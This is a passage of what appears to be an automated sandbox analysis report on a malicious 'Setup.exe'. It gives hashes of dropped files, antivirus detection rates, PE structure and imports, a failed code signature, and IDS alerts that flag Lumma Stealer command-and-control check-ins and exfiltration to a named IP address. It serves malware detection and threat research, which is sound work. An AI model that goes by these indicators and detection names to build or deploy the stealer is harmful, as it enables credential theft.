                                                                                                                                                                                                                                                              SHA-512:978535D1A0A55160088ED8E5AF815A4B96DE35F361B880D4D06D353299D33EAB625E3A38204BCF2FE59E964AA206CA8CF07BBAFEDF1D4D990EFDD5D5649904F9
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                                                                              Entropy (8bit):1.1510207563435464
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:NlllulBkXj:NllUS
                                                                                                                                                                                                                                                              MD5:453075887941F85A80949CDBA8D49A8B
                                                                                                                                                                                                                                                              SHA1:7B31CA484A80AA32BCC06FC3511547BCB1413826
                                                                                                                                                                                                                                                              SHA-256:84466098E76D1CF4D262F2CC01560C765FE842F8901EEE78B2F74609512737F8
                                                                                                                                                                                                                                                              SHA-512:02E95B30978860CB5C83841B68C2E10EE56C9D8021DF34876CD33FD7F0C8B001C288F71FBBFF977DDF83031BD6CD86AC85688A6EFB6300D0221AA4A22ABE7659
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):8767044
                                                                                                                                                                                                                                                              Entropy (8bit):7.960152326344281
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:196608:r7B6e1u5SqD6mOefSP01pbtDgGFN6sskirwDODi:roweOFCS8jbtM8N6sjYY
                                                                                                                                                                                                                                                              MD5:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                                                                                                                              SHA1:60CD79359912A9069674CEE3C5C5982A9B01CE82
                                                                                                                                                                                                                                                              SHA-256:16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
                                                                                                                                                                                                                                                              SHA-512:7D2DF781963C8AC8A6F2A86EB95742AA26C932671D31DF8F09E334B2AF5E543EC3FB636ABFA4FB2512EC70126E1B9DB6DC7E9446A2A85BCA53EAFC790668964A
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                                                              • Filename: installer_1.05_36.7.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: 'Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: SET_UP.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: Full_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: Active_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                                                                                                                              File Type:PNG image data, 3792 x 2093, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):6447207
                                                                                                                                                                                                                                                              Entropy (8bit):7.998441497232368
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:196608:sXKjzP/kSY5cPYsvASGkG9166F/KHaj2M:sXKjrMSY5yPoxv/XL
                                                                                                                                                                                                                                                              MD5:B0CB3F07919BEB69B342ED871C6511A9
                                                                                                                                                                                                                                                              SHA1:C23C0B4F9810D50ECB9EA186F57325C7B41DEEBE
                                                                                                                                                                                                                                                              SHA-256:AB4A4A40AA1C1129150AE38AA4F939EB22B4125F6BE8F12251D7C76239B3F8F3
                                                                                                                                                                                                                                                              SHA-512:75BD57701CAC2BE23A9A63AE414F0E019D7C69523F93B3CE6D908B76CC382D84AB1F1C2B085633D39A8E7294C1879601A1A3B03C5871BA0E35A345F559E06AA4
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp
                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):35616
                                                                                                                                                                                                                                                              Entropy (8bit):6.953519176025623
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                                                                                                                              MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                                                                                                                              SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                                                                                                                              SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                                                                                                                              SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp
                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):6144
                                                                                                                                                                                                                                                              Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                                                              MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                                                              SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                                                              SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                                                              SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):3367424
                                                                                                                                                                                                                                                              Entropy (8bit):6.530011244733973
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                                                                                                                              MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                                                                              SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                                                                                                                                              SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                                                                                                                                              SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp
                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):35616
                                                                                                                                                                                                                                                              Entropy (8bit):6.953519176025623
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                                                                                                                              MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                                                                                                                              SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                                                                                                                              SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                                                                                                                              SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp
                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):6144
                                                                                                                                                                                                                                                              Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                                                              MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                                                              SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                                                              SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                                                              SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):3367424
                                                                                                                                                                                                                                                              Entropy (8bit):6.530011244733973
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                                                                                                                              MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                                                                              SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                                                                                                                                              SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                                                                                                                                              SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):846325235
                                                                                                                                                                                                                                                              Entropy (8bit):0.13954043794048707
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                                                                              SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                                                                                                                                                              SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                                                                                                                                                              SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Entropy (8bit):4.438520098316072
                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                              File name:Setup.exe
                                                                                                                                                                                                                                                              File size:73'424'035 bytes
                                                                                                                                                                                                                                                              MD5:ede2e7d64a73a46b252525a4136b47bf
                                                                                                                                                                                                                                                              SHA1:5025d1d817d6d9f24f1d5197759fafe7cde6f0da
                                                                                                                                                                                                                                                              SHA256:bda506a1ae73f5514cbf100a95f54aeb2877368702fad312fabf0f2641b34f91
                                                                                                                                                                                                                                                              SHA512:86b65b2da27a30233b49e940f2b609cff3805bcf00aa75222e07f783e1e8fb4bcc5b5e4c6fc4e6e264419ccefd92f093acc0e850ace8a9ee34ff81ae59458460
                                                                                                                                                                                                                                                              SSDEEP:24576:lhYvug7sUOQNncXfPm+9zxBRj0oLvcXwH4OPFvpGIr7CJd:fLg7s0Kzx/j7zcXwJPFx17q
                                                                                                                                                                                                                                                              TLSH:47F792DB1212D23238537C47B4909F6298B8CE8D219FC267AB7BC55B271912D139B3F6
                                                                                                                                                                                                                                                              Icon Hash:cc9aa1716d638ecc
                                                                                                                                                                                                                                                              Entrypoint:0x403883
                                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                              Time Stamp:0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC]
                                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                                              CLR (.Net) Version:
OS Version Major:5
OS Version Minor:0
File Version Major:5
File Version Minor:0
Subsystem Version Major:5
Subsystem Version Minor:0
Import Hash:be41bf7b8cc010b614bd36bbca606973
Signature Valid:false
Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232
Not Before:28/03/2024 10:33:37
Not After:29/03/2027 11:33:37
Subject Chain
• CN=LY Corporation, O=LY Corporation, L=Chiyoda-ku, S=Tokyo, C=JP, OID.1.3.6.1.4.1.311.60.2.1.3=JP, SERIALNUMBER=010401039979, OID.2.5.4.15=Private Organization
Version:3
Thumbprint MD5:0829E51406B873B17F0EFEA626560718
Thumbprint SHA-1:3E85990B906DD895BB28206319546E2EEBA81336
Thumbprint SHA-256:4ED8E9F0EBAC3FB0DCDF981D3D82D8BE6CE03D745AD229D0D929A70C5FA55F57
Serial:5FDDA5954FDB2F00B1EFD5C8
Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 00409268h
mov dword ptr [esp+14h], ebp
call dword ptr [00408030h]
push 00008001h
call dword ptr [004080B4h]
push ebp
call dword ptr [004082C0h]
push 00000008h
mov dword ptr [00472EB8h], eax
call 00007FC244C8876Bh
push ebp
push 000002B4h
mov dword ptr [00472DD0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 00409264h
call dword ptr [00408184h]
push 0040924Ch
push 0046ADC0h
call 00007FC244C8844Dh
call dword ptr [004080B0h]
push eax
mov edi, 004C30A0h
push edi
call 00007FC244C8843Bh
push ebp
call dword ptr [00408134h]
cmp word ptr [004C30A0h], 0022h
mov dword ptr [00472DD8h], eax
mov eax, edi
jne 00007FC244C85D3Ah
push 00000022h
pop esi
mov eax, 004C30A2h
push esi
push eax
call 00007FC244C88111h
push eax
call dword ptr [00408260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007FC244C85DC3h
push 00000020h
pop ebx
cmp ax, bx
jne 00007FC244C85D3Ah
add esi, 02h
cmp word ptr [esi], bx
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ C ] VS2010 SP1 build 40219
• [RES] VS2010 SP1 build 40219
• [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9b34 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf4000 | 0xf962 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x45fffe3 | 0x5cc0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7a000 | 0x964 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6dae | 0x6e00 | 00499a6f70259150109c809d6aa0e6ed | False | 0.6611150568181818 | data | 6.508529563136936 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x2a62 | 0x2c00 | 07990aaa54c3bc638bb87a87f3fb13e3 | False | 0.3526278409090909 | data | 4.390535020989255 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xb000 | 0x67ebc | 0x200 | 014871d9a00f0e0c8c2a7cd25606c453 | False | 0.203125 | data | 1.4308602597540492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x73000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xf4000 | 0xf962 | 0xfa00 | 955880a5097bce6ee1e1142b429d7486 | False | 0.913 | data | 7.694370424089605 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x104000 | 0xf32 | 0x1000 | 9de3947dffd0e7fa5ae1af4905563fd3 | False | 0.599609375 | data | 5.511097810722672 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xf4250 | 0x89ff | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 0.9998867721572735
RT_ICON | 0xfcc50 | 0x2b7c | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0009881422924902
RT_ICON | 0xff7cc | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.6672091131000814
RT_ICON | 0x101e34 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.7449908925318761
RT_ICON | 0x102f5c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.848404255319149
RT_DIALOG | 0x1033c4 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x1034c4 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x1035e0 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x103640 | 0x4c | data | English | United States | 0.8026315789473685
RT_MANIFEST | 0x10368c | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193

| DLL | Import |
| --- | --- |
| KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW |
| USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW |
| GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject |
| SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation |
| ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW |
| COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create |
| ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance |
| VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW |

| Language of compilation system | Country where language is spoken | Map |
| --- | --- | --- |
| English | United States | |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| 2025-01-06T12:16:42.314150+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49842 | 104.21.44.159 | 443 | TCP |
| 2025-01-06T12:16:42.805604+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49842 | 104.21.44.159 | 443 | TCP |
| 2025-01-06T12:16:42.805604+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49842 | 104.21.44.159 | 443 | TCP |
| 2025-01-06T12:16:43.277898+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49846 | 104.21.44.159 | 443 | TCP |
| 2025-01-06T12:16:43.751262+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49846 | 104.21.44.159 | 443 | TCP |
| 2025-01-06T12:16:43.751262+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49846 | 104.21.44.159 | 443 | TCP |
| 2025-01-06T12:16:44.508617+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49853 | 104.21.44.159 | 443 | TCP |
| 2025-01-06T12:16:45.040597+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49853 | 104.21.44.159 | 443 | TCP |
| 2025-01-06T12:16:45.564061+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49860 | 104.21.44.159 | 443 | TCP |
| 2025-01-06T12:16:46.693463+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49867 | 104.21.44.159 | 443 | TCP |
| 2025-01-06T12:16:48.136643+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49877 | 104.21.44.159 | 443 | TCP |
| 2025-01-06T12:16:49.164360+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49888 | 104.21.44.159 | 443 | TCP |
| 2025-01-06T12:16:50.509865+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49897 | 104.21.44.159 | 443 | TCP |
| 2025-01-06T12:16:52.602900+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49910 | 104.21.44.159 | 443 | TCP |
